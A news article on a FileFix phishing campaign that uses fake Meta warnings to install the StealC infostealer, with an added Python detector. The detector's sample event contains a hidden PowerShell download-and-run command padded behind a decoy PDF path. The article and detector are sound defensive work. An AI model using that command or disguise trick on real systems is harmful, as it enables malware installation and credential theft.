A new FileFix attack is using novel lures to trick users into downloading malware. As reported by Bleeping Computer, this latest version of the increasingly popular social engineering attack was first discovered by Acronis, who noticed that hackers have been using the FileFix technique and sending out fake Meta account-suspension warnings to convince users to unknowingly download the StealC infostealer.
StealC can exfiltrate usernames and passwords from a wide variety of platforms including credentials stored in the cloud, credentials and authentication cookies from web browsers, credentials from messaging apps, cryptocurrency wallets, VPNs and gaming apps, and it can take screenshots of your desktop too. This new FileFix attack is tricking users by sending fake warning messages that appear to come from Meta’s support team. There’s even a multi-language fake webpage users are directed to after being warned that their account is about to be suspended or disabled.
Using typical phishing urgency with a seven-day deadline, it tells targets that to avoid account suspension they must view an "incident report" that Meta is sharing with them. The "incident report" is really a disguised PowerShell command that downloads the StealC malware onto their system.
Users are asked to click a "Copy" button, which copies what looks like a file path, and are then instructed to open File Explorer and paste it into the address bar, where they're told it will open the "incident report." In reality the copied string is a PowerShell command followed by a long run of spaces and then the fake file path, so the malicious part is pushed out of view in the address bar and easy to miss. The lure also omits the "#" comment symbols that usually give away a ClickFix attack.
FileFix is a variant of the ClickFix family, which uses social engineering to trick users into pasting malicious commands into operating system dialog boxes to "fix" problems that the hackers claim they have. FileFix was created by the researcher mr.d0x and uses the address bar in Windows' File Explorer to execute malicious commands, rather than the Windows Run dialog box used by ClickFix.
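As an added example (not from the Tom's Guide article or the Acronis report), here is a small Python heuristic that scans process-creation events for the pattern described above: a shell spawned by explorer.exe whose command line contains a download-and-execute primitive and ends in a long run of whitespace followed by a decoy document path. The "Key=Value|Key=Value" log format, the sample events (including the lure.invalid hostname), the padding threshold and the address-bar width are all this example's own assumptions, not Acronis's detection logic.

```python
"""Heuristic detector for FileFix-style process-creation events.

Added example: the event lines below are constructed to resemble Sysmon
Event ID 1 fields and are not real telemetry; the detection rule is this
example's own heuristic, not a published Acronis signature.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters a FileFix lure would launch via the File Explorer address bar.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# explorer.exe is the parent when a command is pasted into the address bar.
ADDRESS_BAR_PARENTS = {"explorer.exe"}

# A long run of whitespace (assumed threshold: 10+) followed by a decoy path
# ending in a document-like extension at the very end of the command line.
PADDED_DECOY = re.compile(
    r"\s{10,}\S*\\[^\\\s]+\.(?:pdf|docx?|xlsx?|txt|png|jpe?g)\s*$", re.IGNORECASE
)
# Common PowerShell download-and-execute primitives.
DOWNLOAD_CRADLE = re.compile(
    r"(?:Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile"
    r"|Net\.WebClient|Start-BitsTransfer|Invoke-Expression|\biex\b)",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\Windows\\explorer.exe' -> 'explorer.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse the constructed 'ParentImage=...|Image=...|CommandLine=...' format.

    The split only happens at a '|' that introduces a known key, so a '|'
    inside the command line itself does not break parsing.
    """
    fields: dict[str, str] = {}
    for part in re.split(r"\|(?=(?:ParentImage|Image|CommandLine)=)", line):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the list of FileFix indicators present in one event (empty if none)."""
    reasons: list[str] = []
    if basename(ev.image) not in SHELLS:
        return reasons
    if basename(ev.parent_image) in ADDRESS_BAR_PARENTS:
        reasons.append("shell spawned by explorer.exe")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        reasons.append("download/execute cradle in command line")
    if PADDED_DECOY.search(ev.command_line):
        reasons.append("padded decoy path at end of command line")
    return reasons


def is_filefix_suspect(ev: ProcessEvent) -> bool:
    """The padding trick alone is the strongest tell; require one corroborating indicator."""
    reasons = score_event(ev)
    return "padded decoy path at end of command line" in reasons and len(reasons) >= 2


def what_user_sees(pasted: str, width: int = 60) -> str:
    """Approximate what a narrow address bar shows after a paste: the caret sits at the
    end, so only the last `width` characters are in view (width is an assumption)."""
    return pasted[-width:].strip()


# Constructed sample events (not real logs). Event 0 mimics the lure: a hidden
# PowerShell download, 40 spaces of padding, then a benign-looking report path.
LURE_COMMAND = (
    'powershell -w hidden -c "iwr http://lure.invalid/r -OutFile $env:TEMP\\r.exe; '
    'Start-Process $env:TEMP\\r.exe"'
    + " " * 40
    + "C:\\Users\\Public\\Downloads\\Meta_Incident_Report.pdf"
)
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    f"ParentImage=C:\\Windows\\explorer.exe|Image={PS}|CommandLine={LURE_COMMAND}",
    # A user right-clicking a script in Explorer: same parent, but no padding, no cradle.
    f'ParentImage=C:\\Windows\\explorer.exe|Image={PS}|CommandLine="{PS}" -File C:\\Scripts\\backup.ps1',
    # A scheduled task: different parent, nothing suspicious.
    f"ParentImage=C:\\Windows\\System32\\svchost.exe|Image={PS}|CommandLine=powershell.exe -NoProfile -File C:\\Scripts\\cleanup.ps1",
]


def find_suspects(lines: list[str]) -> list[int]:
    """Indices of events that trip the heuristic."""
    return [i for i, line in enumerate(lines) if is_filefix_suspect(parse_event(line))]


if __name__ == "__main__":
    print("address bar shows:", what_user_sees(LURE_COMMAND))
    for i, line in enumerate(SAMPLE_EVENTS):
        print(i, score_event(parse_event(line)))
    print("suspects:", find_suspects(SAMPLE_EVENTS))
```

Run stand-alone it prints the decoy path that the narrow address bar would show (the PowerShell command is outside the visible window), the indicators for each constructed event, and flags only event 0. The corroboration requirement in is_filefix_suspect keeps the legitimate "Run with PowerShell" case in event 1 from alerting on the explorer.exe parent alone.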
How to stay safe
In its report, Acronis recommends that companies educate their users on these new tactics and on the risks of copying data from a website into a seemingly harmless system dialog. Because this is ultimately a phishing attack, though, what matters most is recognizing the same warning signs found in other phishing and social engineering campaigns.
As with any phishing campaign, if you receive a suspicious email about one of your online accounts, do not click on anything within it. Instead, go directly to that account's website in your browser and check whether there are any messages for you there. Additionally, make sure you enable two-factor authentication (2FA) on your online accounts so that scammers cannot get in even if they do manage to steal your username and password.
Finally, protect your devices and your data from the latest cyber threats by keeping one of the best antivirus software solutions installed and up to date. Also make sure you're familiar with its extra features that can help you stay safe online, such as a VPN or a hardened browser.
Both FileFix and ClickFix attacks seem to be all the rage with hackers these days, and unfortunately this will likely continue until more people become aware of how they work. This is why I implore you to share your knowledge with others so that fewer people fall for these types of attacks. Before doing so, though, make sure you're practicing good cyber hygiene and have taken the necessary steps to secure your own data and devices first.